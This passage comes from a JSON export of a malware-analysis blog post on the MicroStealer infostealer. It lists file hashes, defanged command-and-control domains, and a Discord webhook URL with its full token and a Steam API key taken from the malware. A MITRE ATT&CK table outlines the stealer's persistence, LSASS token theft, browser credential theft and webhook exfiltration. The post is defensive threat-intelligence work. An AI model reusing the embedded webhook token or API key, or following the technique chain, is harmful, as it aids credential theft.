href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>, and continuously&nbsp;monitor&nbsp;emerging infrastructure&nbsp;using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Feeds<\/a>. Together, these capabilities help&nbsp;reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.&nbsp;<\/p>\n\n\n\n<p>ANY.RUN also meets enterprise security and compliance expectations. The company is <a href=\"https:\/\/any.run\/compliance\/\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified,<\/a> reinforcing its commitment to protecting customer data and maintaining strong security controls. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators&nbsp;of&nbsp;Compromise&nbsp;(IOCs)&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Analyzed Files<\/strong>&nbsp;<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-283\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"4\"\n           data-rows=\"4\"\n           data-wpID=\"283\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        Name\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        SHA1\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        RocobeSetup.exe (NSIS Installer)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        23A705FA71DA6A9191618AEDC1144C4A\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        755C21DD36A49086F98C87A172B900E6424F467A\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        9CF1D4F87D9F2EDF53CE681B59C209F57A805E6157693E784D9D946FC3B17A04\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Game Launcher.exe (Electron)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        A137BF79A2D5F1C8104AF40EC93E4E66\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        C83D75BF9F9FDA4E6EF7B2C575BC9D3D82D6590B\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        05F0C8E89248D3477115D9F62B20CA8A95D925140C727E975AB9F3025A5AD01D\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        soft.jar (MicroStealerCore)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        04EA30CD1B74E2844BE939BD1FFE0084\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        B7D0F8954BAFAB5E79AE96C07E683C229C9F7B72\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D4\"\n                    data-col-index=\"3\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        DF5E2B824C0FD40323A46019BFBC325F89B5B68697ED3C94B52189CF90E1BEC4\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-283'>\ntable#wpdtSimpleTable-283{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-283 td, table.wpdtSimpleTable283 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Network indicators<\/strong>&nbsp;<\/h3>\n\n\n\n<p><strong>HTTPS&nbsp;Request:<\/strong>&nbsp;<\/p>\n\n\n\n<p>https[:]\/\/78smp[.]com\/m\/&nbsp;<\/p>\n\n\n\n<p>https[:]\/\/discord[.]com\/api\/webhooks\/1460660027969896695\/FQ2nam1vUVDwLbiTZCPen9C53eBMg_qB3-z8pGRtZ3ZerbyflDnzfmJVLpgElxMNfO41&nbsp;<\/p>\n\n\n\n<p><strong>Domains:&nbsp;<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 wp-block-group-is-layout-grid\">\n<p>vrcpluginhub[.]com&nbsp;<\/p>\n\n\n\n<p>buradakimvar[.]com&nbsp;<\/p>\n\n\n\n<p>kittenscraft[.]com&nbsp;<\/p>\n\n\n\n<p>dashlune[.]xyz&nbsp;<\/p>\n\n\n\n<p>buradabmwking[.]com&nbsp;<\/p>\n\n\n\n<p>crushfall[.]com&nbsp;<\/p>\n\n\n\n<p>slumpcute[.]com&nbsp;&nbsp;<\/p>\n\n\n\n<p>banterplugins[.]com&nbsp;<\/p>\n\n\n\n<p>velyonar[.]com&nbsp;<\/p>\n\n\n\n<p>churilend[.]com&nbsp;<\/p>\n\n\n\n<p>zarvethion[.]com&nbsp;<\/p>\n\n\n\n<p>kittiesmc[.]com&nbsp;<\/p>\n\n\n\n<p>kittycraftmc[.]com&nbsp;<\/p>\n\n\n\n<p>welarith[.]com&nbsp;<\/p>\n\n\n\n<p>eldrynworld[.]com&nbsp;<\/p>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>API Keys<\/strong><\/h3>\n\n\n\n<p>Steam Web API Key: 440D7F4D810EF9298D25EDDF37C1F902&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>MITRE&nbsp;ATT&amp;CK Techniques<\/strong>&nbsp;<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-284\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"19\"\n           data-wpID=\"284\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:29.498525073746%;                    padding:10px;\n                    \"\n                    >\n                                        Tactic\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.038348082596%;                    padding:10px;\n                    \"\n                    >\n                                        Technique\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:37.463126843658%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0002: Execution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1204.002: User Execution: Malicious File\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        User runs NSIS installer \/ Game Launcher\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.001: PowerShell\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        PowerShell script with\u00a0Start-Process -Verb RunAs\u00a0for UAC\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.003: Windows Command Shell\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        schtasks\u00a0used to create ONLOGON task\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0003: Persistence\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1053.005: Scheduled Task\/Job: Scheduled Task\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Task\u00a0App_<username>, ONLOGON, HIGHEST, 5s delay\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0004: Privilege Escalation\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        UAC prompt for elevation (social engineering)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1134.001: Access Token Manipulation: Token Impersonation\/Theft\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        DuplicateToken\u00a0\/\u00a0ImpersonateLoggedOnUser\u00a0on LSASS token\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0005: Defense Evasion\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1027: Obfuscated Files or Information\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Node.js obfuscation + ZKM in JAR\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1036.005: Masquerading: Match Legitimate\u00a0Resource Name or Location\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        miicrosoft.exe, Game Launcher naming\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1497.001: Virtualization\/Sandbox Evasion: System Checks\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Process list check for VMware,\u00a0VBox, QEMU, etc.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0006: Credential Access\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1555.003: Credentials from Password Stores: Credentials from Web Browsers\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C11\"\n                    data-col-index=\"2\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Chromium\/Opera: passwords, autofill via DPAPI\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1539: Steal Web Session Cookie\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C12\"\n                    data-col-index=\"2\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Browser cookies extraction (session hijacking)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A13\"\n                    data-col-index=\"0\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B13\"\n                    data-col-index=\"1\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1552.001: Unsecured Credentials: Credentials\u00a0InFiles\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C13\"\n                    data-col-index=\"2\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Wallet files and browser extension storage\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A14\"\n                    data-col-index=\"0\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B14\"\n                    data-col-index=\"1\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1003.001: OS Credential Dumping: LSASS Memory\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C14\"\n                    data-col-index=\"2\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        LSASS access when\u00a0RunAsPPL=0, token duplicate\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A15\"\n                    data-col-index=\"0\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0007: Discovery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B15\"\n                    data-col-index=\"1\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1082: System Information Discovery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C15\"\n                    data-col-index=\"2\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Collects hostname, OS, username, env vars for exfil\u00a0report\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A16\"\n                    data-col-index=\"0\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0009: Collection\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B16\"\n                    data-col-index=\"1\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1113: Screen Capture\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C16\"\n                    data-col-index=\"2\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Screenshot via\u00a0java.awt.Robot, PNG\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A17\"\n                    data-col-index=\"0\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B17\"\n                    data-col-index=\"1\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1560.001: Archive Collected Data: Archive via Utility\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C17\"\n                    data-col-index=\"2\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ZIP before\u00a0exfiltration\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A18\"\n                    data-col-index=\"0\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0010: Exfiltration\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B18\"\n                    data-col-index=\"1\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1567.004: Exfiltration Over Web Service: Exfiltration Over Webhook\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C18\"\n                    data-col-index=\"2\"\n                    data-row-index=\"17\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Data sent to Discord\/webhook\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A19\"\n                    data-col-index=\"0\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0011: Command and Control\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B19\"\n                    data-col-index=\"1\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1071.001: Application Layer Protocol: Web Protocols\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C19\"\n                    data-col-index=\"2\"\n                    data-row-index=\"18\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        HTTPS to C2 \/ webhooks\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-284'>\ntable#wpdtSimpleTable-284{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-284 td, table.wpdtSimpleTable284 th { white-space: normal !important; }\n<\/style>\n\n","protected":false},"excerpt":{"rendered":"<p>Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay&nbsp;limited?&nbsp; In recent investigations, ANY.RUN researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. Early activity points to distribution through compromised or impersonated accounts, [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":19062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-19049","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>MicroStealer: Emerging Infostealer Targeting Corporate Credentials<\/title>\n<meta name=\"description\" content=\"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it faster.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nevergiveupcpp, 4OURUP and GridGuardGhoul\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"},\"author\":{\"name\":\"nevergiveupcpp, 4OURUP and GridGuardGhoul\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0\",\"datePublished\":\"2026-03-12T09:56:43+00:00\",\"dateModified\":\"2026-03-25T10:16:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"},\"wordCount\":3551,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\",\"name\":\"MicroStealer: Emerging Infostealer Targeting Corporate Credentials\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-03-12T09:56:43+00:00\",\"dateModified\":\"2026-03-25T10:16:50+00:00\",\"description\":\"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it faster.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as 